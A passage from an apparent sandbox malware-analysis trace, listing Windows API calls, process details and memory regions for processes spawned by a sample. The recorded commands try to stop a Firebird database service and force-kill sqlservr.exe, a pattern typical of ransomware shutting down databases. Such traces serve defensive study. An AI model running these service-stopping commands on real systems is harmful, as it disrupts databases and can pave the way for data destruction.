_wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="XACTSRV") returned -18 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="TCPIP") returned -14 [0126.694] _wcsicmp (_String1="FIREBIRDSERVERDEFAULTINSTANCE", _String2="TCPIP") returned -14 [0126.694] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x9eb2f0 [0126.694] OpenServiceW (hSCManager=0x9eb2f0, lpServiceName="FIREBIRDSERVERDEFAULTINSTANCE", dwDesiredAccess=0x84) returned 0x0 [0126.694] GetLastError () returned 0x424 [0126.695] CloseServiceHandle (hSCObject=0x9eb2f0) returned 1 [0126.695] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.695] LoadLibraryW (lpLibFileName="NETMSG") returned 0x860000 [0126.714] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.770] GetFileType (hFile=0x40) returned 0x2 [0126.770] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x82f9d0 | out: lpMode=0x82f9d0) returned 1 [0126.770] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x82f9dc, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x82f9dc*=0x1e) returned 1 [0126.770] GetFileType (hFile=0x40) returned 0x2 [0126.770] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x82f9d0 | out: lpMode=0x82f9d0) returned 1 [0126.770] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x82f9dc, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x82f9dc*=0x2) returned 1 [0126.770] _ultow (in: _Dest=0x889, _Radix=8583664 | out: _Dest=0x889) returned="2185" [0126.771] FormatMessageW (in: dwFlags=0x2800, lpSource=0x860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.787] GetFileType (hFile=0x40) returned 0x2 [0126.787] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x82f9c0 | out: lpMode=0x82f9c0) returned 1 [0126.787] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x82f9cc, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x82f9cc*=0x34) returned 1 [0126.788] GetFileType (hFile=0x40) returned 0x2 [0126.788] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x82f9c0 | out: lpMode=0x82f9c0) returned 1 [0126.788] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x82f9cc, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x82f9cc*=0x2) returned 1 [0126.788] NetApiBufferFree (Buffer=0x9e7f88) returned 0x0 [0126.788] NetApiBufferFree (Buffer=0x9e80f0) returned 0x0 [0126.788] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop FirebirdServerDefaultInstance" [0126.788] exit (_Code=2) Thread: id = 361 os_tid = 0xd70 Thread: id = 362 os_tid = 0xd78 Process: id = "89" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xcc4b000" os_pid = "0xd7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c taskkill \\/IM sqlservr.exe \\/F" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5623 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5624 start_va = 0xb70000 end_va = 0x4b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 5625 start_va = 0x4b70000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 5626 start_va = 0x4b90000 end_va = 0x4b90fff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 5627 start_va = 0x4ba0000 end_va = 0x4bb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 5628 start_va = 0x4bc0000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 5629 start_va = 0x4c00000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 5630 start_va = 0x4d00000 end_va = 0x4d03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d00000" filename = "" Region: id = 5631 start_va = 0x4d10000 end_va = 0x4d10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d10000" filename = "" Region: id = 5632 start_va = 0x4d20000 end_va = 0x4d21fff entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 5633 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5634 start_va = 0x7eb60000 end_va = 0x7eb82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb60000" filename = "" Region: id = 5635 start_va = 0x7eb86000 end_va = 0x7eb86fff entry_point = 0x0 region_type = private name = "private_0x000000007eb86000" filename = "" Region: id = 5636 start_va = 0x7eb8c000 end_va = 0x7eb8efff entry_point = 0x0 region_type = private name = "private_0x000000007eb8c000" filename = "" Region: id = 5637 start_va = 0x7eb8f000 end_va = 0x7eb8ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb8f000" filename = "" Region: id = 5638 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5639 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5640 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5641 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5642 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5643 start_va = 0x4da0000 end_va = 0x4daffff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 5644 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5645 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5646 start_va = 0x4fa0000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 5647 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5688 start_va = 0x4b70000 end_va = 0x4b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b70000" filename = "" Region: id = 5689 start_va = 0x4d30000 end_va = 0x4d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 5690 start_va = 0x4db0000 end_va = 0x4e6dfff entry_point = 0x4db0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5691 start_va = 0x4e70000 end_va = 0x4f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 5692 start_va = 0x5140000 end_va = 0x514ffff entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 5693 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5694 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5695 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5696 start_va = 0x7ea60000 end_va = 0x7eb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea60000" filename = "" Region: id = 5697 start_va = 0x7eb89000 end_va = 0x7eb8bfff entry_point = 0x0 region_type = private name = "private_0x000000007eb89000" filename = "" Region: id = 5698 start_va = 0x4b80000 end_va = 0x4b83fff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 5699 start_va = 0x4b90000 end_va = 0x4b93fff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 5700 start_va = 0x5150000 end_va = 0x5486fff entry_point = 0x5150000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 363 os_tid = 0xd74 [0126.965] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0126.965] __set_app_type (_Type=0x1) [0126.965] __p__fmode () returned 0x77ac4d6c [0126.965] __p__commode () returned 0x77ac5b1c [0126.965] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0126.966] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0126.966] GetCurrentThreadId () returned 0xd74 [0126.966] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd74) returned 0x84 [0126.966] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0126.966] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0126.966] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.969] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.969] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4cff71c | out: phkResult=0x4cff71c*=0x0) returned 0x2 [0126.969] VirtualQuery (in: lpAddress=0x4cff723, lpBuffer=0x4cff6d4, dwLength=0x1c | out: lpBuffer=0x4cff6d4*(BaseAddress=0x4cff000, AllocationBase=0x4c00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0126.969] VirtualQuery (in: lpAddress=0x4c00000, lpBuffer=0x4cff6d4, dwLength=0x1c | out: lpBuffer=0x4cff6d4*(BaseAddress=0x4c00000, AllocationBase=0x4c00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0126.969] VirtualQuery (in: lpAddress=0x4c01000, lpBuffer=0x4cff6d4, dwLength=0x1c | out: lpBuffer=0x4cff6d4*(BaseAddress=0x4c01000, AllocationBase=0x4c00000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0126.969] VirtualQuery (in: lpAddress=0x4c03000, lpBuffer=0x4cff6d4, dwLength=0x1c | out: lpBuffer=0x4cff6d4*(BaseAddress=0x4c03000, AllocationBase=0x4c00000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0126.969] VirtualQuery (in: lpAddress=0x4d00000, lpBuffer=0x4cff6d4, dwLength=0x1c | out: lpBuffer=0x4cff6d4*(BaseAddress=0x4d00000, AllocationBase=0x4d00000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0126.969] GetConsoleOutputCP () returned 0x1b5 [0126.969] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0126.970] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0126.970] _get_osfhandle (_FileHandle=1) returned 0x3c [0126.970] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0126.970] _get_osfhandle (_FileHandle=1) returned 0x3c [0126.970] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0126.970] _get_osfhandle (_FileHandle=1) returned 0x3c [0126.970] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0126.970] _get_osfhandle (_FileHandle=0) returned 0x38 [0126.970] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0126.970] _get_osfhandle (_FileHandle=0) returned 0x38 [0126.970] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0126.971] GetEnvironmentStringsW () returned 0x4fa7d78* [0126.971] FreeEnvironmentStringsA (penv="A") returned 1 [0126.971] GetEnvironmentStringsW () returned 0x4fa7d78* [0126.971] FreeEnvironmentStringsA (penv="A") returned 1 [0126.971] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cfe680 | out: phkResult=0x4cfe680*=0x94) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x0, lpData=0x4cfe68c*=0xc8, lpcbData=0x4cfe688*=0x1000) returned 0x2 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x4, lpData=0x4cfe68c*=0x1, lpcbData=0x4cfe688*=0x4) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x0, lpData=0x4cfe68c*=0x1, lpcbData=0x4cfe688*=0x1000) returned 0x2 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x4, lpData=0x4cfe68c*=0x0, lpcbData=0x4cfe688*=0x4) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x4, lpData=0x4cfe68c*=0x40, lpcbData=0x4cfe688*=0x4) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x4, lpData=0x4cfe68c*=0x40, lpcbData=0x4cfe688*=0x4) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x0, lpData=0x4cfe68c*=0x40, lpcbData=0x4cfe688*=0x1000) returned 0x2 [0126.971] RegCloseKey (hKey=0x94) returned 0x0 [0126.971] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cfe680 | out: phkResult=0x4cfe680*=0x94) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x0, lpData=0x4cfe68c*=0x40, lpcbData=0x4cfe688*=0x1000) returned 0x2 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x4, lpData=0x4cfe68c*=0x1, lpcbData=0x4cfe688*=0x4) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x0, lpData=0x4cfe68c*=0x1, lpcbData=0x4cfe688*=0x1000) returned 0x2 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x4, lpData=0x4cfe68c*=0x0, lpcbData=0x4cfe688*=0x4) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x4, lpData=0x4cfe68c*=0x9, lpcbData=0x4cfe688*=0x4) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x4, lpData=0x4cfe68c*=0x9, lpcbData=0x4cfe688*=0x4) returned 0x0 [0126.971] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4cfe684, lpData=0x4cfe68c, lpcbData=0x4cfe688*=0x1000 | out: lpType=0x4cfe684*=0x0, lpData=0x4cfe68c*=0x9, lpcbData=0x4cfe688*=0x1000) returned 0x2 [0126.971] RegCloseKey (hKey=0x94) returned 0x0 [0126.972] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2982f [0126.972] srand (_Seed=0x5ad2982f) [0126.972] GetCommandLineW () returned="/c taskkill \\/IM sqlservr.exe \\/F" [0126.972] GetCommandLineW () returned="/c taskkill \\/IM sqlservr.exe \\/F" [0126.972] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0126.972] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4fa9cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0126.972] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0126.972] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0126.972] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0126.972] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0126.972] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0126.972] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0126.972] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0126.972] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0126.972] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0126.972] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0126.972] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0126.972] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0126.972] GetEnvironmentStringsW () returned 0x4fa7d78* [0126.972] FreeEnvironmentStringsA (penv="A") returned 1 [0126.972] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.972] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0126.972] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0126.972] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0126.972] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0126.972] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0126.972] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0126.972] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0126.973] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0126.973] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0126.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4cff458 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0126.973] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4cff458, lpFilePart=0x4cff450 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cff450*="Desktop") returned 0x1d [0126.973] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0126.973] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4cff1d8 | out: lpFindFileData=0x4cff1d8) returned 0x4fa05c8 [0126.973] FindClose (in: hFindFile=0x4fa05c8 | out: hFindFile=0x4fa05c8) returned 1 [0126.973] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4cff1d8 | out: lpFindFileData=0x4cff1d8) returned 0x4fa05c8 [0126.973] FindClose (in: hFindFile=0x4fa05c8 | out: hFindFile=0x4fa05c8) returned 1 [0126.973] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0126.973] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4cff1d8 | out: lpFindFileData=0x4cff1d8) returned 0x4fa05c8 [0126.973] FindClose (in: hFindFile=0x4fa05c8 | out: hFindFile=0x4fa05c8) returned 1 [0126.973] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0126.973] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0126.973] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0126.973] GetEnvironmentStringsW () returned 0x4fa7d78* [0126.973] FreeEnvironmentStringsA (penv="=") returned 1 [0126.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0126.974] GetConsoleOutputCP () returned 0x1b5 [0126.974] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0126.974] GetUserDefaultLCID () returned 0x409 [0126.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0126.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4cff588, cchData=128 | out: lpLCData="0") returned 2 [0126.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4cff588, cchData=128 | out: lpLCData="0") returned 2 [0126.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4cff588, cchData=128 | out: lpLCData="1") returned 2 [0126.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0126.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0126.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0126.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0126.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0126.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0126.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0126.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0126.975] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0126.975] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0126.975] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0126.975] GetConsoleTitleW (in: lpConsoleTitle=0x4faa9f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.976] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0126.976] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0126.976] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0126.976] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0126.976] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0126.976] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0126.976] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0126.976] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0126.976] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0126.977] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0126.977] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0126.977] GetConsoleTitleW (in: lpConsoleTitle=0x4cff270, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 